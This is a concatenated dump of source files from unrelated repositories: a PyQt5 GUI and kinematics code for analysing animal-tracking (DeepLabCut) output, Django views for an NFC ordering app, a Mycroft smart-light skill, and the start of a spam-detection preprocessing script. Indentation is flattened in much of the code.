results[param] = np.full((data_rows_count,), np.NAN)
### Calculations
# estimate the TCOM label position
tcom_x, tcom_y = auxiliaryfunctions.estimate_TCOM_label_coords(data.loc[:, (scorer, 'Tail_A', "x")],
data.loc[:, (scorer, 'Tail_A', 'y')],
data.loc[:, (scorer, 'Tail_B', 'x')],
data.loc[:, (scorer, 'Tail_B', 'y')])
# for every frame
for index in range(len(tcom_x)):
# build a TCOM vector
likelihood_hip = data.loc[index, (scorer, "Hip", "likelihood")]
likelihood_tail_a = data.loc[index, (scorer, "Tail_A", "likelihood")]
likelihood_tail_b = data.loc[index, (scorer, "Tail_B", "likelihood")]
if likelihood_hip >= likelihood and likelihood_tail_a >= likelihood and likelihood_tail_b >= likelihood:
tcom_vector = ((data.loc[index, (scorer, "Hip", "x")] - tcom_x[index]),
(data.loc[index, (scorer, "Hip", "y")] - tcom_y[index]))
print("TCOM vector: ", tcom_vector)
else:
tcom_vector = (np.nan, np.nan)
# get the body axis vector
body_axis_vector = auxiliaryfunctions.calc_body_axis(data, index, scorer)
# calculate the angle between the two
# TODO: find out which values mean which (+ vs -)
angle_deg = auxiliaryfunctions.py_angle_betw_2vectors_atan(body_axis_vector, tcom_vector)
# add angle to results dataframe
results[tail_kinematic_params[0]][index] = angle_deg
print("angular amplitudes: ", results[tail_kinematic_params[0]])
print("length of amplitudes: ", len(results[tail_kinematic_params[0]]))
    # calculate the angular velocity from the amplitude list
    dy = np.diff(results[tail_kinematic_params[0]])
    dy = np.append(dy, np.nan)  # pad with NaN so the series keeps one value per frame
for index, val in enumerate(dy):
results[tail_kinematic_params[1]][index] = val
# calculate the angular acceleration from velocity list
ddy = np.diff(results[tail_kinematic_params[1]])
    ddy = np.append(ddy, np.nan)  # pad with NaN so the series keeps one value per frame
for index, val in enumerate(ddy):
results[tail_kinematic_params[2]][index] = val
print("{" + "\n".join("{!r}: {!r},".format(k, v) for k, v in results.items()) + "}")
return results
```
#### File: ClimbingLizardDLCAnalysis/lizardanalysis/DOKA_GUI.py
```python
import sys
import traceback
import datetime
from time import sleep
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtGui import QColor, QPixmap, QFont
from PyQt5.QtWidgets import *
from lizardanalysis.GUI.DLC_Output_Kinematic_Analysis import Ui_MainWindow # importing our generated file
from lizardanalysis.calculations import read_in_files
from tkinter import filedialog, Tk
import os
from pathlib import Path
from lizardanalysis.start_new_analysis import new
from lizardanalysis.utils import auxiliaryfunctions
from lizardanalysis import analyze_files, initialize
from functools import partial
from lizardanalysis.start_new_analysis import gui_define_video_orientation_v2
class WorkerSignals(QtCore.QObject):
'''
Defines the signals available from a running worker thread.
Supported signals are:
finished
No data
error
`tuple` (exctype, value, traceback.format_exc() )
result
`object` data returned from processing, anything
progress
`int` indicating % progress
'''
finished = QtCore.pyqtSignal()
error = QtCore.pyqtSignal(tuple)
result = QtCore.pyqtSignal(object)
progress = QtCore.pyqtSignal(int)
class Worker(QtCore.QRunnable):
'''
Worker thread
Inherits from QRunnable to handler worker thread setup, signals and wrap-up.
:param callback: The function callback to run on this worker thread. Supplied args and
kwargs will be passed through to the runner.
:type callback: function
:param args: Arguments to pass to the callback function
:param kwargs: Keywords to pass to the callback function
'''
def __init__(self, fn, *args, **kwargs):
super(Worker, self).__init__()
# Store constructor arguments (re-used for processing)
self.fn = fn
self.args = args
self.kwargs = kwargs
self.signals = WorkerSignals()
# Add the callback to our kwargs
self.kwargs['progress_callback'] = self.signals.progress
@QtCore.pyqtSlot()
def run(self):
'''
Initialise the runner function with passed args, kwargs.
'''
# Retrieve args/kwargs here; and fire processing using them
try:
result = self.fn(*self.args, **self.kwargs)
except:
traceback.print_exc()
exctype, value = sys.exc_info()[:2]
self.signals.error.emit((exctype, value, traceback.format_exc()))
else:
self.signals.result.emit(result) # Return the result of the processing
finally:
self.signals.finished.emit() # Done
class DOKA_mainWindow(QtWidgets.QMainWindow):
def __init__(self):
super(DOKA_mainWindow, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.threadpool = QtCore.QThreadPool()
###
# variables
###
self.project_name = ""
self.project_experimenter = ""
self.project_species = ""
self.DLC_path = ""
self.project_config_file = ""
self.progress = 0
self.updateProgress(self.progress)
self.project_loaded = False
self.label_buttons = []
self.new_label_buttons = []
self.x_coord = None
self.y_coord = None
self.label_coords = []
self.labels = []
self.labels_orig = self.labels.copy()
self.button_diameter = 20
self.animal = None
self.animal_image_size = None
self.QLabel_topcorner = (530, 180) # the top corner of the Qlabel which contains the pixmap image
self.new_label_counter = 0
self.new_labels = []
# create list of translated labels to use arbitrary naming convention
# format: ["name_in_DOKA","name_in_config"],[]...
self.label_reassignment = []
self.clicked = None
###
# assign button / lineEdit functions
###
self.ui.Project_name_lineEdit.textChanged.connect(self.set_project_name)
self.ui.Project_experimenter_lineEdit.textChanged.connect(self.set_project_experimenter)
self.ui.Project_species_lineEdit.textChanged.connect(self.set_project_species)
self.ui.Project_openDLCFiles_pushButton.pressed.connect(self.choose_DLC_folder)
self.ui.Project_confirmNew_pushButton.pressed.connect(self.confirmNew)
self.ui.Project_openConfig_pushButton.pressed.connect(self.choose_Existing_Project)
self.ui.Project_confirm_pushButton.pressed.connect(self.confirmExistingProject)
self.ui.Animal_lizard_pushButton.pressed.connect(self.select_Lizard)
self.ui.Animal_spider_pushButton.pressed.connect(self.select_Spider)
self.ui.Animal_ant_pushButton.pressed.connect(self.select_Ant)
self.ui.Animal_stick_pushButton.pressed.connect(self.select_Stick)
self.ui.animal_addNewLabels_pushButton.setCheckable(True)
self.ui.animal_addNewLabels_pushButton.clicked.connect(self.add_new_labels)
self.ui.animal_confirmAddedLabels_pushButton.pressed.connect(self.save_changes)
self.ui.letsGo_pushButton.pressed.connect(self.start_analysis)
###
    # add new labels functions:
def mouseLabelPos(self, QMouseEvent): # also tried mousePressEvent...
        # TODO: Doesn't work, crashes when the button-checked if condition is uncommented, and freezes (infinite loop?) as written here.
print("mouse event")
# if QMouseEvent.button() == QtCore.Qt.LeftButton:
        self.x_coord = QMouseEvent.pos().x()  # QPoint does not support indexing; use .x()/.y()
        self.y_coord = QMouseEvent.pos().y()
print("mouse click: ", QMouseEvent.pos())
name = "name"
self.new_labels.append([name, self.x_coord, self.y_coord])
self.draw_new_label_button()
def draw_new_label_button_threaded(self, progress_callback):
""" draws the last added label"""
self.new_label_buttons.append(QPushButton(str(len(self.label_buttons) + len(self.new_labels) + 1), self))
self.new_label_buttons[-1].setGeometry(int(self.new_labels[-1][1] - self.button_diameter / 2),
int(self.new_labels[-1][2] - self.button_diameter / 2),
self.button_diameter, self.button_diameter)
# setting radius and border
style_sheet_grey = "QPushButton{border-radius :" + str(
int(self.button_diameter / 2)) + ";border: 2px solid blue;color: white}"
self.new_label_buttons[-1].setStyleSheet(style_sheet_grey)
self.new_label_buttons[-1].setFont(QFont('Times', 9))
# set up mouse over text
self.new_label_buttons[-1].setToolTip('click to assign label from <b>config</b> file')
# to set custom stylesheets for QToolTip
# self.label_buttons[-1].setStyleSheet("QToolTip{background-color: black;color:white;border:black solid 1px}")
# connect to label select function. Using functools.partial to pass the number of the label as an additional
# argument to reuse the same dialog function for all label buttons
self.new_label_buttons[-1].clicked.connect(
partial(self.open_label_dialog, (len(self.label_buttons) + len(self.new_labels) + 1)))
self.new_label_buttons[-1].show()
def draw_new_label_button(self):
worker = Worker(self.draw_new_label_button_threaded)
self.threadpool.start(worker)
# (load / create) project functions
def set_project_name(self):
self.project_name = self.ui.Project_name_lineEdit.text()
self.setWindowTitle("DLC Output Kinematic Analysis" + " - " + self.project_name)
def set_project_experimenter(self):
self.project_experimenter = self.ui.Project_experimenter_lineEdit.text()
def set_project_species(self):
self.project_species = self.ui.Project_species_lineEdit.text()
def choose_DLC_folder_threaded(self, progress_callback):
root = Tk()
root.withdraw() # use to hide tkinter window
current_path = os.getcwd()
if self.ui.Project_openDLCFiles_lineEdit.text is not None:
current_path = self.DLC_path
selected_path = filedialog.askdirectory(parent=root, initialdir=current_path,
title='Please select a directory containing all DLC output files (.csv) for this project')
if len(selected_path) > 0:
self.DLC_path = selected_path
self.log_info(self.DLC_path)
self.ui.Project_openDLCFiles_lineEdit.setText(self.DLC_path)
root.destroy()
def choose_DLC_folder(self):
worker = Worker(self.choose_DLC_folder_threaded)
self.threadpool.start(worker)
def choose_Existing_Project(self):
worker = Worker(self.choose_Existing_Project_threaded)
self.threadpool.start(worker)
def choose_Existing_Project_threaded(self, progress_callback):
root = Tk()
root.withdraw() # use to hide tkinter window
current_path = os.getcwd()
if self.ui.Project_openConfig_lineEdit.text is not None:
current_path = self.ui.Project_openConfig_lineEdit.text
config_file_path = filedialog.askopenfilename(parent=root, initialdir=current_path,
                                                      title='Please select the config file of the project to open')
if len(config_file_path) > 0:
self.log_info("Selected project at: " + config_file_path)
self.ui.Project_openConfig_lineEdit.setText(config_file_path)
self.project_config_file = config_file_path
root.destroy()
def confirmNew(self):
self.project_set_up = False
if len(self.DLC_path) > 0 and len(self.project_name) > 0 and len(self.project_experimenter) > 0 and len(
self.project_species) > 0:
if self.animal is not None:
if os.path.exists(self.DLC_path):
worker = Worker(self.createProject_threaded, animal=self.animal)
worker.kwargs['animal'] = self.animal
self.threadpool.start(worker)
else:
self.log_warning("Invalid path to DLC Files!")
else:
self.log_warning("Select an animal before starting your project!")
else:
self.log_warning("Missing information to set up new project!")
def handleValueUpdated(self, value):
self.clicked = value
self.log_info("clicked value set to: " + self.clicked)
def createProject_threaded(self, animal, progress_callback):
print("in createProjectThreaded")
if self.animal == "lizard":
# TODO: fix direction of climbing GUI
#checker = gui_define_video_orientation_v2.ConfirmationChecker(self)
#checker.valueUpdated.connect(self.handleValueUpdated)
#self.w = gui_define_video_orientation_v2.directionGUI_mainWindow()
#self.w.show()
clicked = 3
else:
clicked = 1
date = datetime.datetime.today().strftime('%Y-%m-%d')
self.project_config_file = new.create_new_project(project=self.project_name,
experimenter=self.project_experimenter,
species=self.project_species,
file_directory=self.DLC_path,
animal=self.animal,
clicked=clicked)
self.ui.Project_openConfig_lineEdit.setText(self.project_config_file)
self.log_info("New project created: " + os.path.join(os.getcwd(), self.project_config_file))
sleep(0.02) # wait briefly to log info in correct order. I know, beautifully written code.
self.log_warning("Define framerate & shutter in created config.yaml")
sleep(0.02) # wait briefly to log info in correct order. I know, beautifully written code.
self.log_info("Click CONFIRM existing project to load generated config file!")
def confirmExistingProject(self):
if self.animal is not None:
# read in the config file: get labels and number of files
if len(self.project_config_file) > 0:
current_path = os.getcwd()
worker = Worker(self.confirmExistingProject_threaded)
self.threadpool.start(worker)
else:
self.log_warning("select a config file to open an existing project first!")
else:
self.log_warning("Select an animal before loading your project!")
def update_labels(self):
# clear list before loading elements from config file
self.ui.Labels_listWidget.clear()
style_sheet_green = "QPushButton{border-radius :" + str(
self.button_diameter / 2) + ";border: 2px solid green;color: white }"
style_sheet_grey = "QPushButton{border-radius :" + str(
int(self.button_diameter / 2)) + ";border: 2px solid grey;color: white}"
QToolTip.setFont(QFont('SansSerif', 9))
label_count = 0
for i, label in enumerate(self.label_coords):
found = ""
for elem in range(len(self.labels)):
# if the label is listed as a default label or as a reassigned label, colour the respective button
# we start by checking for reassigned labels
if [label[0], self.labels_orig[elem]] in self.label_reassignment:
self.label_buttons[i].setStyleSheet(style_sheet_green)
self.label_buttons[i].setToolTip('label: <b>' + self.labels_orig[elem] + '</b>')
                    # try to find a matching entry (only relevant when a label has previously been assigned incorrectly)
try:
orig_button = \
self.label_reassignment[self.label_reassignment.index([label[0], self.labels_orig[elem]])][
1]
# find entry in label_coords
ind = [i[0] for i in self.label_coords].index(orig_button)
# set old button, corresponding to the original label, to grey/unassigned
self.label_buttons[ind].setStyleSheet(style_sheet_grey)
self.label_buttons[ind].setToolTip('click to assign label from <b>config</b> file')
except:
pass
found = self.labels_orig[elem]
break
# if the button has not been reassigned we check the labels for an entry
if label[0] == self.labels[elem]:
self.label_buttons[i].setStyleSheet(style_sheet_green)
self.label_buttons[i].setToolTip('label: <b>' + self.labels_orig[elem] + '</b>')
found = self.labels_orig[elem]
break
if i < 10:
self.add_labels("(0" + str(i) + ")" + " " + found)
else:
self.add_labels("(" + str(i) + ")" + " " + found)
if found != "":
label_count += 1
self.ui.Labels_listWidget.sortItems(QtCore.Qt.AscendingOrder)
self.ui.Info_numLabels_lcdNumber.display(label_count)
def confirmExistingProject_threaded(self, progress_callback):
config_file = Path(self.project_config_file).resolve()
cfg = auxiliaryfunctions.read_config(config_file)
# get labels
self.labels = cfg['labels']
self.labels_orig = self.labels.copy()
# labels = "; ".join(labels) # bring list in gui printable format
# self.ui.Info_text_label.setText(labels)
# get number of files
files = cfg['file_sets'].keys() # object type ('CommentedMapKeysView' object), does not support indexing
filelist = [] # store filepaths as list
for file in files:
filelist.append(file)
number_of_files = len(filelist)
self.ui.Info_numFiles_lcdNumber.display(number_of_files)
calculations, calculations_str, MODULE_PREFIX = initialize(self.animal)
# check for label reassignment when re(loading) project configuration
if len(self.label_reassignment) > 0:
print("label reassignment: ", self.label_reassignment)
for reassignment in self.label_reassignment:
for i, label in enumerate(cfg['labels']):
if label == reassignment[1]:
cfg['labels'][i] = reassignment[0]
print("config labels: ", cfg['labels'])
try:
calculations_checked, calculations_checked_namelist, calculations_all_list = read_in_files.check_calculation_requirements(
cfg, calculations, calculations_str, MODULE_PREFIX)
# clear and reload all elements of the calculations table each time a project is loaded to avoid repeated
# display of the same entries
if self.project_loaded:
self.ui.calculations_tableWidget.setRowCount(0)
self.ui.calculations_tableWidget.setColumnCount(2)
for calc in calculations_all_list:
row_position = self.ui.calculations_tableWidget.rowCount()
self.ui.calculations_tableWidget.insertRow(row_position)
self.ui.calculations_tableWidget.setItem(row_position, 0, QTableWidgetItem(str(calc)))
if calc in calculations_checked_namelist:
self.ui.calculations_tableWidget.item(row_position, 0).setBackground(QColor(100, 255, 100))
self.ui.calculations_tableWidget.setColumnWidth(0, 200)
self.ui.calculations_tableWidget.setColumnWidth(1, 50)
self.ui.calculations_tableWidget.setHorizontalHeaderItem(0, QTableWidgetItem("Calculation"))
self.ui.calculations_tableWidget.setHorizontalHeaderItem(1, QTableWidgetItem("Run"))
except TypeError:
self.log_warning("No executable calculations found!")
# TODO Insert checkbox for desired calculations
self.project_loaded = True
self.update_labels()
def add_new_labels_threaded(self, progress_callback):
self.ui.animal_QLabel.mouseClickEvent = self.mouseLabelPos
### add new labels to animal: ###
def add_new_labels(self):
"""
this function enables the user to click onto the lizard image and generate new labels with left click,
move them with dragging and delete them with middle mouse button.
New labels will be stored as lists of the format ["name", x, y], where x and y are the coordinates in the image.
:return:
"""
# test if project has been loaded yet
# TODO: uncomment after testing
# if self.animal is not None:
# # read in the config file: get labels and number of files
# if len(self.project_config_file) > 0:
# ## put code below here!
# else:
# self.log_warning("select a config file to open an existing project first!")
# else:
# self.log_warning("Select an animal before loading your project!")
self.ui.animal_addNewLabels_pushButton.setChecked(True)
print("button is checked: ", self.ui.animal_addNewLabels_pushButton.isChecked())
self.ui.animal_QLabel.mouseClickEvent = self.mouseLabelPos
# worker = Worker(self.add_new_labels_threaded)
# self.threadpool.start(worker)
# TODO: get the correct size of image from self.animal_image_size in px to define coordinates correctly
# create list with new labels with the format: ["name", x, y]
def save_changes(self):
self.ui.animal_addNewLabels_pushButton.setChecked(False)
print("button is checked: ", self.ui.animal_addNewLabels_pushButton.isChecked())
# append labels to self.label_coords
for new_label in self.new_labels:
self.label_coords.append(new_label)
### INFO SECTION ###
def log_info(self, info):
now = datetime.datetime.now()
# TODO add item colour (red for warnings)
self.ui.Log_listWidget.addItem(now.strftime("%H:%M:%S") + " [INFO] " + info)
self.ui.Log_listWidget.sortItems(QtCore.Qt.DescendingOrder)
def log_warning(self, info):
now = datetime.datetime.now()
self.ui.Log_listWidget.addItem(now.strftime("%H:%M:%S") + " [WARNING] " + info)
self.ui.Log_listWidget.sortItems(QtCore.Qt.DescendingOrder)
def add_labels(self, label_text):
self.ui.Labels_listWidget.addItem(label_text)
self.ui.Labels_listWidget.sortItems(QtCore.Qt.DescendingOrder)
def updateProgress(self, progress):
self.progress = progress
self.ui.Info_progressBar.setValue(int(self.progress))
def start_analysis(self):
if self.project_loaded:
worker = Worker(self.start_analysis_threaded)
worker.signals.progress.connect(self.updateProgress)
# parse the animal selected through the gui to the callback:
worker.kwargs['animal'] = self.animal
self.threadpool.start(worker)
else:
self.log_warning("A config file needs to be selected first!")
def start_analysis_threaded(self, progress_callback, animal):
self.log_info("Analyzing project at " + self.project_config_file)
analyze_files(self.project_config_file, self.label_reassignment, callback=progress_callback, animal=self.animal)
progress_callback.emit(100)
### ANALYSIS SECTION ###
def delete_label_buttons(self):
for button in self.label_buttons:
button.deleteLater()
self.label_buttons = []
def draw_label_buttons(self):
for num, label in enumerate(self.label_coords):
# create button for each label
self.label_buttons.append(QPushButton(str(num), self))
self.label_buttons[-1].setGeometry(int(label[1] - self.button_diameter / 2),
int(label[2] - self.button_diameter / 2),
self.button_diameter, self.button_diameter)
# setting radius and border
style_sheet_grey = "QPushButton{border-radius :" + str(
int(self.button_diameter / 2)) + ";border: 2px solid grey;color: white}"
self.label_buttons[-1].setStyleSheet(style_sheet_grey)
self.label_buttons[-1].setFont(QFont('Times', 9))
# set up mouse over text
self.label_buttons[-1].setToolTip('click to assign label from <b>config</b> file')
# to set custom stylesheets for QToolTip
# self.label_buttons[-1].setStyleSheet("QToolTip{background-color: black;color:white;border:black solid 1px}")
# connect to label select function. Using functools.partial to pass the number of the label as an additional
# argument to reuse the same dialog function for all label buttons
self.label_buttons[-1].clicked.connect(partial(self.open_label_dialog, num))
self.label_buttons[-1].show()
def open_label_dialog(self, num):
if self.project_loaded:
dlg = LabelSelectDialog(self)
dlg.setWindowTitle("select label: " + self.label_buttons[num].text())
for label in self.labels:
if label != "bodyparts":
dlg.comboBoxLabels.addItem(label)
if dlg.exec_():
self.log_info("assigned " + self.label_buttons[num].text() + " to " + dlg.comboBoxLabels.currentText())
new_assignment = [self.label_coords[num][0], dlg.comboBoxLabels.currentText()]
# remove previous reassignment, if present
if len(self.label_reassignment) > 0:
for i, pair in enumerate(self.label_reassignment):
if pair[0] == new_assignment[0]:
del self.label_reassignment[i]
self.label_reassignment.append(new_assignment)
# update existing project to display newly available calculations
self.confirmExistingProject()
else:
print("Canceled assignment!")
else:
self.log_warning("Load project before assigning labels!")
def select_Lizard(self):
lizard_img = QPixmap(os.path.join("GUI", "lizard_shape.svg"))
self.ui.animal_QLabel.setPixmap(lizard_img)
        self.animal_image_size = self.ui.animal_QLabel.pixmap().size()  # gets the actual size in pixels
print("animal_image_size: ", self.animal_image_size)
self.animal = "lizard"
self.log_info("Selected animal : " + self.animal)
self.label_coords = [
["nose", 652, 262],
["shoulder", 814, 271],
["spine", 915, 268],
["hip", 1027, 279],
["tail_middle", 1205, 366],
["tail_tip", 1205, 559],
["shoulder_fr", 813, 243],
["fr_knee", 828, 207],
["fr", 790, 205],
["fr_to", 781, 227],
["fr_to1", 757, 220],
["fr_tm", 742, 202],
["fr_ti1", 751, 173],
["fr_ti", 789, 170],
["shoulder_hr", 1037, 258],
["hr_knee", 1054, 218],
["hr", 1092, 245],
["hr_ti", 1095, 215],
["hr_ti1", 1113, 207],
["hr_tm", 1134, 203],
["hr_to", 1122, 266],
["hr_to1", 1163, 232],
["shoulder_hl", 1017, 301],
["hl_knee", 992, 331],
["hl", 1022, 365],
["hl_ti", 997, 374],
["hl_ti1", 991, 396],
["hl_tm", 1001, 416],
["hl_to", 1050, 385],
["hl_to1", 1039, 434],
["shoulder_fl", 820, 303],
["fl_knee", 826, 331],
["fl", 802, 353],
["fl_to", 790, 335],
["fl_to1", 767, 345],
["fl_tm", 758, 372],
["fl_ti1", 777, 397],
["fl_ti", 815, 386],
['spine_a', 862, 266], # workaround for now just add the new labels as defaults to lizards
['spine_c', 975, 269],
['tail_a', 1126, 317],
['tail_c', 1266, 460]
]
self.delete_label_buttons()
self.draw_label_buttons()
if self.project_loaded:
self.update_labels()
def select_Spider(self):
spider_img = QPixmap(os.path.join("GUI", "spider_shape.svg"))
self.ui.animal_QLabel.setPixmap(spider_img)
        self.animal_image_size = self.ui.animal_QLabel.pixmap().size()  # gets the actual size in pixels
print("animal_image_size: ", self.animal_image_size)
self.animal = "spider"
self.log_info("Selected animal : " + self.animal)
self.label_coords = [
["l1", 744, 172],
["lm1", 848, 308],
["lb1", 936, 334],
["l2", 627, 334],
["lm2", 828, 377],
["lb2", 932, 351],
["l3", 761, 443],
["lm3", 880, 424],
["lb3", 931, 367],
["l4", 823, 558],
["lm4", 906, 448],
["lb4", 934, 381],
["r1", 1177, 173],
["rm1", 1072, 308],
["rb1", 984, 334],
["r2", 1299, 334],
["rm2", 1093, 376],
["rb2", 990, 351],
["r3", 1164, 444],
["rm3", 1042, 423],
["rb3", 991, 367],
["r4", 1100, 559],
["rm4", 1017, 450],
["rb4", 989, 382],
["head", 962, 318],
["body", 962, 390],
["tail", 961, 473]
]
self.delete_label_buttons()
self.draw_label_buttons()
if self.project_loaded:
self.update_labels()
def select_Ant(self):
ant_img = QPixmap(os.path.join("GUI", "ant_shape.svg"))
self.ui.animal_QLabel.setPixmap(ant_img)
        self.animal_image_size = self.ui.animal_QLabel.pixmap().size()  # gets the actual size in pixels
print("animal_image_size: ", self.animal_image_size)
self.animal = "ant"
self.log_info("Selected animal : " + self.animal)
self.label_coords = [
["l1", 810, 200],
["lm1", 850, 275],
["lb1", 928, 298],
["l2", 774, 450],
["lm2", 854, 346],
["lb2", 933, 326],
["l3", 781, 554],
["lm3", 844, 423],
["lb3", 940, 346],
["r1", 1111, 200],
["rm1", 1069, 275],
["rb1", 992, 298],
["r2", 1145, 450],
["rm2", 1066, 346],
["rb2", 988, 326],
["r3", 1136, 554],
["rm3", 1074, 423],
["rb3", 980, 346],
["lmandible", 941, 168],
["rmandible", 979, 168],
["head", 959, 209],
["t1", 959, 296],
["t2", 959, 324],
["t3", 959, 340],
["abdomen", 959, 430]
]
self.delete_label_buttons()
self.draw_label_buttons()
if self.project_loaded:
self.update_labels()
def select_Stick(self):
stick_img = QPixmap(os.path.join("GUI", "stick_shape.svg"))
self.ui.animal_QLabel.setPixmap(stick_img)
        self.animal_image_size = self.ui.animal_QLabel.pixmap().size()  # gets the actual size in pixels
print("animal_image_size: ", self.animal_image_size)
self.animal = "stick"
self.log_info("Selected animal : " + self.animal)
self.label_coords = [
["l1", 715, 464],
["rt1", 756, 272],
["lm1", 796, 451],
["lb1", 862, 383],
["l2", 886, 505],
["rt2", 909, 243],
["lm2", 929, 470],
["lb2", 956, 395],
["l3", 1206, 522],
["rt3", 1144, 237],
["lm3", 1073, 466],
["lb3", 1026, 396],
["r1", 715, 269],
["lt1", 756, 458],
["rm1", 795, 280],
["rb1", 862, 348],
["r2", 886, 227],
["lt2", 909, 487],
["rm2", 929, 263],
["rb2", 956, 339],
["r3", 1206, 211],
["lt3", 1144, 495],
["rm3", 1072, 267],
["rb3", 1026, 337],
["lantenna", 621, 455],
["rantenna", 621, 275],
["head", 816, 366],
["t1", 873, 366],
["t2", 962, 366],
["t3", 1024, 366],
["abdomen", 1304, 366]
]
self.delete_label_buttons()
self.draw_label_buttons()
if self.project_loaded:
self.update_labels()
class LabelSelectDialog(QDialog):
def __init__(self, *args, **kwargs):
super(LabelSelectDialog, self).__init__(*args, **kwargs)
self.setWindowTitle("select label from config file")
buttons = QDialogButtonBox.Ok | QDialogButtonBox.Cancel
self.buttonBox = QDialogButtonBox(buttons)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.comboBoxLabels = QComboBox()
self.layout = QVBoxLayout()
self.layout.addWidget(self.comboBoxLabels)
self.layout.addWidget(self.buttonBox)
self.setLayout(self.layout)
app = QtWidgets.QApplication([])
application = DOKA_mainWindow()
application.show()
sys.exit(app.exec())
```
#### File: JojoReikun/ClimbingLizardDLCAnalysis/lizardanalysis.py
```python
from lizardanalysis import cli
def main():
cli.main()
if __name__ == '__main__':
main()
``` |
{
"source": "jojoriveraa/titulacion-NFCOW",
"score": 2
} |
#### File: NFCow/products/views.py
```python
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from .forms import ProductForm
from .models import Product
from shopping_carts.models import Shopping_Cart
from django.contrib.auth.models import User
from rel_products_shopping_carts.models import Rel_Product_Shopping_Cart
# Create your views here.
def product_detail(request, id):
if request.method == 'POST':
form = ProductForm(request.POST)
if form.is_valid():
q_product = Product.objects.filter(id = id)[0]
q_quantity = form.cleaned_data['quantity']
q_user = User.objects.filter(username = request.user)[0]
q1 = Shopping_Cart.objects.filter(user = request.user)
q2 = q1.filter(available = True)
if not q2:
q_shopping_cart = Shopping_Cart.objects.create_shopping_cart(date_time = timezone.now(), user = q_user)
else:
q3 = q2.order_by('date_time').reverse()[0]
q_shopping_cart = q3
shc_id = q_shopping_cart.id
Rel_Product_Shopping_Cart.objects.create(product = q_product, quantity = q_quantity, shopping_cart = q_shopping_cart)
return HttpResponseRedirect('/shopping-cart/%s' % shc_id)
else:
form = ProductForm(request.POST or None)
product = get_object_or_404(Product, id = id)
return render(request, 'product.html', {'form' : form, 'product' : product, 'q_user' : request.user})
```
#### File: NFCow/rel_products_orders/models.py
```python
from django.db import models
from orders.models import Order
from products.models import Product
# Create your models here.
class Rel_Product_Order(models.Model):
order = models.ForeignKey(Order)
product = models.ForeignKey(Product)
def price(self):
return self.product.price
def __str__(self):
return self.order.payment_date_time.strftime("%Y-%m-%d %H:%M:%S") + " ; " + self.order.user() + " ; " + self.product.name
```
#### File: NFCow/rel_products_shopping_carts/views.py
```python
from django.http import HttpResponseRedirect
from django.shortcuts import render
from .models import Rel_Product_Shopping_Cart
# Create your views here.
def product_remove(request, id, sc):
product_in_shopping_cart = id
shopping_cart_id = sc
Rel_Product_Shopping_Cart.objects.filter(id = product_in_shopping_cart).delete()
return HttpResponseRedirect('/shopping-cart/%s' % shopping_cart_id)
```
#### File: NFCow/restaurants/models.py
```python
from django.db import models
from categories.models import Category
# Create your models here.
class Restaurant(models.Model):
name = models.CharField(max_length = 255)
image = models.ImageField(upload_to = 'restaurants')
categories = models.ManyToManyField('categories.Category', blank = True, related_name = 'restaurants_category',)
def img(self):
return """
<img src="%s" height="42">
""" % self.image.url
img.allow_tags = True
img.admin_order_field = 'image'
def __str__(self):
return self.name
``` |
{
"source": "JojoSr/frx_iot_skill",
"score": 2
} |
#### File: JojoSr/frx_iot_skill/__init__.py
```python
import requests
from mycroft import MycroftSkill, intent_file_handler
class FrxIot(MycroftSkill):
def __init__(self):
MycroftSkill.__init__(self)
def send_command(self, unit, command, value):
cmd = { "id":unit, "command":command, "value":value}
resp = requests.post('http://10.0.3.100/api/Command', json=cmd)
self.log.info('Requesting Command For Url ....')
self.log.info(resp.status_code)
self.log.info(resp.text)
if resp.status_code != 200:
self.speak_dialog('err_'+command)
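        # Example of the JSON body posted above (values as used by the intent handlers below):
        #   {"id": "LIGHT-88F3-A567B67D453C", "command": "white_light_1", "value": "1"}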
@intent_file_handler('light.on.intent')
def handle_lights_on(self, message):
self.send_command('LIGHT-88F3-A567B67D453C', 'white_light_1', '1')
self.send_command('LIGHT-88F3-A567B67D453C', 'red_light_1', '1')
self.send_command('LIGHT-88F3-A567B67D453C', 'blue_light_1', '1')
self.speak_dialog('iot.frx')
@intent_file_handler('light.off.intent')
def handle_lights_off(self, message):
self.send_command('LIGHT-88F3-A567B67D453C', 'white_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'red_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'blue_light_1', '0')
self.speak_dialog('iot.frx')
@intent_file_handler('red_light.intent')
def handle_lights_red(self, message):
self.send_command('LIGHT-88F3-A567B67D453C', 'white_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'red_light_1', '1')
self.send_command('LIGHT-88F3-A567B67D453C', 'blue_light_1', '0')
self.speak_dialog('iot.frx')
@intent_file_handler('blue_light.intent')
def handle_lights_blue(self, message):
self.send_command('LIGHT-88F3-A567B67D453C', 'white_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'red_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'blue_light_1', '1')
self.speak_dialog('iot.frx')
@intent_file_handler('white_lights.intent')
def handle_lights_white(self, message):
self.send_command('LIGHT-88F3-A567B67D453C', 'white_light_1', '1')
self.send_command('LIGHT-88F3-A567B67D453C', 'red_light_1', '0')
self.send_command('LIGHT-88F3-A567B67D453C', 'blue_light_1', '0')
self.speak_dialog('iot.frx')
def create_skill():
return FrxIot()
``` |
{
"source": "jojotshitenge/spam-detection-using-deep-learning",
"score": 3
} |
#### File: jojotshitenge/spam-detection-using-deep-learning/data_utils.py
```python
import pandas as pd
from keras.preprocessing import text
import pickle
import os
from bs4 import BeautifulSoup
from email.parser import Parser
parser = Parser()
# Load Data
def process_dataset():
data = pd.read_csv("data/enron.csv")
print(f"Total emails: {len(data)}")
emails = data['msg'].values
labels = [1 if x == "spam" else 0 for x in data['label'].values]
# Pre-process Data
# tokenizer = text.Tokenizer(char_level=True)
# tokenizer.fit_on_texts(emails)
# sequences = tokenizer.texts_to_sequences(emails)
# word2index = tokenizer.word_index
# num_words = len(word2index)
# print(f"Found {num_words} unique tokens")
alphabet = "abcdefghijklmnopqrstuvwxyz0123456789-,;.!?:"
char2index = {}
for i, c in enumerate(alphabet):
char2index[c] = i + 1
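    # Resulting mapping (derived from the alphabet above): 'a'->1 ... 'z'->26, '0'->27 ... '9'->36,
    # then '-', ',', ';', '.', '!', '?', ':' -> 37..43; characters outside the alphabet are skipped below.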
sequences = []
for email in emails:
